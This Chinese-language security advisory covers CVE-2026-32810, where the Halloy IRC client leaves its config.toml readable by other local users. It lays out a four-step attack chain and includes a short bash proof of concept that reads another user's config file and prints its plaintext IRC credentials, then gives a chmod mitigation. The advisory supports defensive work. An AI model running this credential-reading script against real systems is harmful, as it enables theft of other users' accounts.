CVE-2026-32810 CVSS 5.5 中危

CVE-2026-32810 Halloy 配置文件权限泄露漏洞

披露日期: 2026-03-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32810

漏洞类型

权限管理不当

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Halloy

漏洞概述

Halloy是一款用Rust编写的IRC客户端应用程序。在受影响版本的*nix和macOS系统中，Halloy在创建配置目录及文件时使用了默认的umask权限设置。这导致文件权限通常为0644，目录权限为0755。由于权限过于宽松，系统上的任何本地用户均可读取存储在config.toml中的明文IRC凭据或引用的密码文件路径，从而导致敏感信息泄露。

技术细节

该漏洞的根本原因是Halloy在创建配置文件时未显式设置严格的文件权限控制，而是依赖于系统默认的umask值。在大多数Unix-like及macOS系统中，默认umask通常为022，导致新创建的普通文件权限为644（所有者读写，组和其他用户只读），目录权限为755。Halloy将敏感的IRC服务器连接凭证（如用户名和密码）以明文形式存储在配置文件config.toml中，或通过password_file引用外部文件。由于上述权限设置问题，拥有系统本地访问权限的任何其他用户（即使是低权限用户）都可以直接访问这些文件。攻击者无需特殊权限或用户交互，只需通过简单的文件读取命令（如cat）即可获取目标用户的IRC登录凭据，进而接管账户进行未授权操作。

攻击链分析

STEP 1

1. 获取本地访问

攻击者获得目标系统的本地访问权限，可以是低权限用户。

STEP 2

2. 定位配置文件

确定Halloy配置文件的默认存储路径（如~/.config/halloy/config.toml）。

STEP 3

3. 读取敏感文件

利用默认的umask权限（0644），直接读取config.toml或password_file内容。

STEP 4

4. 窃取凭据

从文件中提取明文密码和用户名，用于登录受害者的IRC账户。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# PoC for CVE-2026-32810: Halloy Config File Information Disclosure
# Description: Attempt to read the halloy configuration file of another user.

TARGET_USER="victim"
CONFIG_FILE="/home/$TARGET_USER/.config/halloy/config.toml"

# Check if file exists and is readable
if [ -r "$CONFIG_FILE" ]; then
    echo "[+] Vulnerability Confirmed: Config file is readable by current user."
    echo "[+] Dumping sensitive content:"
    cat "$CONFIG_FILE"
else
    echo "[-] Cannot read config file or file does not exist."
fi

影响范围

Halloy (commit f180e41061db393acf65bc99f5c5e7397586d9cb 之前)

防御指南

临时缓解措施

在未升级软件前，用户可以手动限制配置目录和文件的访问权限（例如执行 `chmod 600 ~/.config/halloy/config.toml`），以防止其他本地用户读取敏感信息。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表